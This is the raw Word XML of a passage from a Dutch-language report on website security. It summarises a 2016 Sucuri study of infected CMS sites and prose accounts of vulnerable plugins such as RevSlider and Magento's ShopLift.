      <w:r w:rsidR="00C529C4">
        <w:t xml:space="preserve">Google gaf </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C529C4">
        <w:t>bounties</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C529C4">
        <w:t xml:space="preserve"> uit voor het oplossen van deze problemen, de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C529C4">
        <w:t>bounties</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C529C4">
        <w:t xml:space="preserve"> konden een bedrag van </w:t>
      </w:r>
      <w:r w:rsidR="000662B4">
        <w:t xml:space="preserve">7,500 dollar bereiken. </w:t>
      </w:r>
      <w:r w:rsidR="00C529C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00300154">
        <w:t>In het artikel worden 21 security bugs genoemd, deze zijn alle opgelost</w:t>
      </w:r>
      <w:r w:rsidR="00742F57">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00742F57">
        <w:t>threatpost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00742F57">
        <w:t>, 2016]</w:t>
      </w:r>
      <w:r w:rsidR="000B5F7A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4988C" w14:textId="6B0A8DBB" w:rsidR="00845CAA" w:rsidRPr="00723BE8" w:rsidRDefault="00332BA1" w:rsidP="00332BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc491022067"/>
      <w:r>
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidR="00375977">
        <w:t>.4</w:t>
      </w:r>
      <w:r w:rsidR="00740679" w:rsidRPr="00723BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A2794B">
        <w:t>Sucuri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A2794B">
        <w:t xml:space="preserve"> rapport</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidR="00A2794B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F52DDEA" w14:textId="77777777" w:rsidR="000F5FE2" w:rsidRDefault="00F3148E">
      <w:r>
        <w:t xml:space="preserve">Er zijn ongeveer 1 miljard websites online en </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>de</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aantal blijft</w:t>
      </w:r>
      <w:r w:rsidR="00E41066">
        <w:t xml:space="preserve"> maar</w:t>
      </w:r>
      <w:r w:rsidR="00526E18">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>stijgen.</w:t>
      </w:r>
      <w:r w:rsidR="00277DF6">
        <w:t xml:space="preserve"> De kracht achter deze </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00277DF6">
        <w:t>stijging  zijn</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00277DF6">
        <w:t xml:space="preserve"> Content Management Systemen (CMS). Deze technologieën maken het mogelijk om gemakkelijk een simpele website op te zetten, het enige wat een persoon nodig heeft is een host en een installatie van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00277DF6">
        <w:t>één</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00277DF6">
        <w:t xml:space="preserve"> van de grote CMS systemen, </w:t>
      </w:r>
      <w:r w:rsidR="00FE6AA3">
        <w:t>deze</w:t>
      </w:r>
      <w:r w:rsidR="00277DF6">
        <w:t xml:space="preserve"> zijn: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00277DF6">
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00277DF6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00277DF6">
        <w:t>Joomla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00277DF6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00277DF6">
        <w:t>Drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00277DF6">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00277DF6">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00277DF6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006C4FAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00692A4C">
        <w:t xml:space="preserve">Om het nog makkelijker te maken bieden sommige host als Digital Ocean een geautomatiseerde </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00692A4C">
        <w:t>CMS installatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00692A4C">
        <w:t xml:space="preserve"> aan. </w:t>
      </w:r>
      <w:r w:rsidR="00AD617E">
        <w:t xml:space="preserve">De explosie van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AD617E">
        <w:t>CSM technologieën</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AD617E">
        <w:t xml:space="preserve"> heeft ervoor gezorgd dat een derde van alle websites aangedreven door zulke soort CMS applicaties. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003006F2">
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003006F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B42E7C">
        <w:t xml:space="preserve">leidt met 60% op de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B42E7C">
        <w:t>CMS markt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B42E7C">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r w:rsidR="003006F2">
        <w:t>heef</w:t>
      </w:r>
      <w:r w:rsidR="00B42E7C">
        <w:t>t dus de</w:t>
      </w:r>
      <w:r w:rsidR="003006F2">
        <w:t xml:space="preserve"> grootste </w:t>
      </w:r>
      <w:r w:rsidR="00B42E7C">
        <w:t>marktaandeel</w:t>
      </w:r>
      <w:r w:rsidR="00F23B3D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CB78FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C9610F">
        <w:t xml:space="preserve">Andere </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C9610F">
        <w:t>CMS platforms</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C9610F">
        <w:t xml:space="preserve"> concentreren zich meer op niche markten zoals </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C9610F">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C9610F">
        <w:t xml:space="preserve"> voor e-commerce en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C9610F">
        <w:t>Drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C9610F">
        <w:t xml:space="preserve"> voor grote </w:t>
      </w:r>
      <w:r w:rsidR="00416CF2">
        <w:t>bedrijfssystemen</w:t>
      </w:r>
      <w:r w:rsidR="00C9610F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A45799">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100A82D2" w14:textId="77777777" w:rsidR="00A456C2" w:rsidRDefault="000F5FE2">
      <w:r>
        <w:t xml:space="preserve">Elke particulier kan een host en domein kopen en daar een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> instantie op instaleren.</w:t>
      </w:r>
      <w:r w:rsidR="00E77D57">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E77D57">
        <w:t>Sucuri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E77D57">
        <w:t xml:space="preserve"> noemt dit fenomeen </w:t>
      </w:r>
      <w:r w:rsidR="0087653F">
        <w:t>User A</w:t>
      </w:r>
      <w:r w:rsidR="00E77D57" w:rsidRPr="0087653F">
        <w:t>doption</w:t>
      </w:r>
      <w:r w:rsidR="00D82BB0">
        <w:t xml:space="preserve">, dit zorgt ervoor er een grote vloed aan ongeschoolde webmasters en </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D82BB0">
        <w:t>service providers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D82BB0">
        <w:t xml:space="preserve"> verantwoordelijk zijn voor het ontwikkelen en onderhouden van websites. </w:t>
      </w:r>
      <w:r w:rsidR="0016344F">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="004C3A96">
        <w:t xml:space="preserve">at blijkt uit de analyse die </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C3A96">
        <w:t>Sucuri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C3A96">
        <w:t xml:space="preserve"> in het eerste kwartaal van 2016 heeft gedaan, waarin vermeld wordt </w:t>
      </w:r>
      <w:r w:rsidR="00E81453">
        <w:t xml:space="preserve">dat uit de 11,000 </w:t>
      </w:r>
      <w:r w:rsidR="00A87AA2">
        <w:t xml:space="preserve">geïnfecteerde </w:t>
      </w:r>
      <w:r w:rsidR="00E81453">
        <w:t xml:space="preserve">websites die geanalyseerd zijn, 75% gebruik </w:t>
      </w:r>
      <w:r w:rsidR="00150D4A">
        <w:t xml:space="preserve">maken van de platform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00150D4A">
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E234C4">
        <w:t xml:space="preserve">. Wat ook een groot probleem blijkt te zijn is het updaten van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E234C4">
        <w:t>CMS platformen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E234C4">
        <w:t xml:space="preserve"> en dit komt mededankzij de ongeschoolde, onervaren webmasters die liever geen tijd besteden aan het onderhouden van hun websites. </w:t>
      </w:r>
      <w:r w:rsidR="002B070D">
        <w:t xml:space="preserve">Er wordt geschat dat 50% van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B070D">
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B070D">
        <w:t xml:space="preserve"> website </w:t>
      </w:r>
      <w:r w:rsidR="0095291E">
        <w:t xml:space="preserve">niet up-to-date zijn en </w:t>
      </w:r>
      <w:r w:rsidR="00D81245">
        <w:t xml:space="preserve">voor </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D81245">
        <w:t>CMS platformen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D81245">
        <w:t xml:space="preserve"> die mi</w:t>
      </w:r>
      <w:r w:rsidR="00013AE6">
        <w:t xml:space="preserve">nder nadruk leggen op </w:t>
      </w:r>
      <w:r w:rsidR="00CC16DC">
        <w:t>compatibiliteit</w:t>
      </w:r>
      <w:r w:rsidR="00013AE6">
        <w:t xml:space="preserve"> met eerdere versies</w:t>
      </w:r>
      <w:r w:rsidR="00AA0512">
        <w:t xml:space="preserve"> is het percentage nog hoger, 80%</w:t>
      </w:r>
      <w:r w:rsidR="00013AE6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AA0512">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E13A78A" w14:textId="17C6235F" w:rsidR="00B474D7" w:rsidRDefault="00A456C2">
      <w:r>
        <w:t xml:space="preserve">Voor het eerste kwartaal van 2016 heeft </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sucuri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> een aantal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS platformen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> geanalyseerd op kwetsbaarheden binnen het systeem. Het resultaat van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sucuri’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> laat zien dat de drie meest geïnfecteerde </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS platformen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zijn </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Joombla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Tijdens de kwetsbaarheid analyse</w:t>
      </w:r>
      <w:r w:rsidR="00013AE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D82FED">
        <w:t xml:space="preserve">is er meer naar de installatie, configuratie, en algemene onderhoudt door de webmasters dan de </w:t>
      </w:r>
      <w:r w:rsidR="00576CD3">
        <w:t xml:space="preserve">kern van de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00576CD3">
        <w:t>CMS platformen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00576CD3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8B91FD" w14:textId="77777777" w:rsidR="00A47B66" w:rsidRDefault="003B4996" w:rsidP="00A47B66">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="676E35A5" wp14:editId="009A5B6E">
            <wp:extent cx="5486400" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Grafiek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747AC62" w14:textId="131AA86A" w:rsidR="00A00E22" w:rsidRPr="0025062D" w:rsidRDefault="00406CFA" w:rsidP="00A47B66">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Grafiek</w:t>
      </w:r>
      <w:r w:rsidR="008B2EEC" w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.2</w:t>
      </w:r>
      <w:r w:rsidR="00AE0FD1" w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="00A47B66" w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00352E1C" w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00A47B66" w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00352E1C" w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Geïnfecteerde platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3C5159" w14:textId="72F5CDA8" w:rsidR="002C3D58" w:rsidRPr="00784933" w:rsidRDefault="00F73345">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B2EEC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="000D7B42" w:rsidRPr="002B7EC7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.3.1</w:t>
      </w:r>
      <w:r w:rsidR="00AC200F" w:rsidRPr="002B7EC7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C3D58" w:rsidRPr="002B7EC7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Extensie kwetsbaarheden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646FAA27" w14:textId="77777777" w:rsidR="00001CB9" w:rsidRDefault="00ED0DA2">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS platformen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> moedigen software ontwikkelaars aan om extensies te maken </w:t>
      </w:r>
      <w:r w:rsidR="003C6380">
        <w:t xml:space="preserve">om nieuwe features aan de systemen toe te voegen. </w:t>
      </w:r>
      <w:r w:rsidR="00BB5D59">
        <w:t xml:space="preserve">Maar wat de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BB5D59">
        <w:t>CMS platformen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BB5D59">
        <w:t xml:space="preserve"> niet willen zijn extensies met kwetsbaarheden, jammer genoeg is hier niet voldoende zicht op en wordt er niet veel aan kwaliteit controle gedaan. </w:t>
      </w:r>
      <w:r w:rsidR="008F76E3">
        <w:t>Dit zorgt ervoor dat de meeste kwetsbaarheden te vinden zijn in extensies.</w:t>
      </w:r>
      <w:r w:rsidR="0003036D">
        <w:t xml:space="preserve"> Er kunnen kwetsbaarheden te vinden zijn in de kern van de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0003036D">
        <w:t>CMS systemen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0003036D">
        <w:t xml:space="preserve"> maar, deze zijn nog te onderhouden </w:t>
      </w:r>
      <w:r w:rsidR="00D93B86">
        <w:t>door het uitgeven van patches, mits de webmaster de CMS</w:t>
      </w:r>
      <w:r w:rsidR="00D77812">
        <w:t xml:space="preserve"> systeem niet up-to-date houdt. </w:t>
      </w:r>
      <w:r w:rsidR="00A2164A">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00D43323">
        <w:t xml:space="preserve">xtensies kunnen door iedereen met een beetje </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D43323">
        <w:t>software ontwikkeling</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D43323">
        <w:t xml:space="preserve"> kennis gemaakt worden. De </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D43323">
        <w:t>security problemen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D43323">
        <w:t xml:space="preserve"> ontstaan wanneer ongeschoolde, onervaren software ontwikkelaars zwak beveiligde software vrijgeven als CMS extensies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0499C0C7" w14:textId="45D1C4EF" w:rsidR="002B49E9" w:rsidRDefault="003B224F">
      <w:r>
        <w:t xml:space="preserve">De drie extensies die de meeste websites hebben geïnfecteerd met kwetsbaarheden zijn </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RevSlider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GravityForms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TimThumb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00903DF1">
        <w:t xml:space="preserve">In 2014 heeft </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00903DF1">
        <w:t>Sucuri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00903DF1">
        <w:t xml:space="preserve"> een </w:t>
      </w:r>
      <w:r w:rsidR="00B3354D">
        <w:t>onderzoek gedaan n</w:t>
      </w:r>
      <w:r w:rsidR="004E0BE0">
        <w:t xml:space="preserve">aar de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E0BE0">
        <w:t>RevSlider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E0BE0">
        <w:t xml:space="preserve"> en een artikel gepubliceerd </w:t>
      </w:r>
      <w:r w:rsidR="00440F93">
        <w:t xml:space="preserve">dat er meer dan 100,000 websites getroffen zijn door een malware die zijn aanval richt op de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00440F93">
        <w:t>plugin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00440F93">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00440F93">
        <w:t>RevSlider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00440F93">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D3752A">
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D3752A">
        <w:t>security probleem</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A350EC">
        <w:t xml:space="preserve"> doet zich voor in de Premium </w:t>
      </w:r>
      <w:r w:rsidR="00D3752A">
        <w:t xml:space="preserve">versie van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D3752A">
        <w:t>RevSlider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D3752A">
        <w:t xml:space="preserve">. De kwetsbaarheid zorgt ervoor dat hackers elke bestand van de server kan downloaden. </w:t>
      </w:r>
      <w:r w:rsidR="00406902">
        <w:t>Dit wordt vooral gebruikt om inloggegevens te stelen van de database.</w:t>
      </w:r>
      <w:r w:rsidR="00B74A9D">
        <w:t xml:space="preserve"> Gebruikers moeten voorzichtig zijn bij het gebruiken van derde partij </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B74A9D">
        <w:t>plugins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B74A9D">
        <w:t xml:space="preserve"> en goed onderzoek doen naar rapporten die geschreven zijn over de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B74A9D">
        <w:t>plugins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B74A9D">
        <w:t xml:space="preserve"> op gebied van security.</w:t>
      </w:r>
      <w:r w:rsidR="00240527">
        <w:t xml:space="preserve"> Zo kunnen zij voorkomen dat zij een doelwit worden voor cyberaanvallen van hackers.</w:t>
      </w:r>
      <w:r w:rsidR="00406902">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00974FD0">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00974FD0">
        <w:t xml:space="preserve"> maakt ook gebruik van derde partij </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00974FD0">
        <w:t>pl</w:t>
      </w:r>
      <w:r w:rsidR="0050173B">
        <w:t>ugins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0050173B">
        <w:t xml:space="preserve"> en doet blijkbaar ook niet genoeg </w:t>
      </w:r>
      <w:r w:rsidR="00F548FE">
        <w:t xml:space="preserve">aan kwaliteit controle. De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F548FE">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F548FE">
        <w:t xml:space="preserve"> extensie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E8750D">
        <w:t>ShopLift</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E8750D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E8750D">
        <w:t>Supee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E8750D">
        <w:t xml:space="preserve"> is een ander voorbeeld van een kwetsbare extensie. Hackers gebruiken de exploiteer technieken SQL Injecties en </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E8750D">
        <w:t>XSS aanvallen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E8750D">
        <w:t xml:space="preserve"> om administratie accounts toe te voegen aan het systeem.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DD2F97" w14:textId="77777777" w:rsidR="00682DBC" w:rsidRDefault="008548F8">
      <w:r>
        <w:t>Zoals nu duidelijk is zijn de extensies de meest voorkomende bron van kwe</w:t>
      </w:r>
      <w:r w:rsidR="003E37BE">
        <w:t xml:space="preserve">tsbaarheden maar niet de enige. Het </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003E37BE">
        <w:t>security probleem</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003E37BE">
        <w:t xml:space="preserve"> waar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E37BE">
        <w:t>Sucuri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E37BE">
        <w:t xml:space="preserve"> naar refereert als Out-of-date is een al sinds dat de eerste stukje </w:t>
      </w:r>
      <w:r w:rsidR="005C64CB">
        <w:t xml:space="preserve">onbeveiligde </w:t>
      </w:r>
      <w:r w:rsidR="003E37BE">
        <w:t xml:space="preserve">code </w:t>
      </w:r>
      <w:r w:rsidR="005C64CB">
        <w:t>een dreiging voor de website.</w:t>
      </w:r>
      <w:r w:rsidR="0053700F">
        <w:t xml:space="preserve"> Hackers vinden met genoeg </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0053700F">
        <w:t>tijd,  motivatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0053700F">
        <w:t xml:space="preserve"> en voorzieningen een manier om de software kwetsbaarheid te exploiteren.</w:t>
      </w:r>
      <w:r w:rsidR="00682DBC">
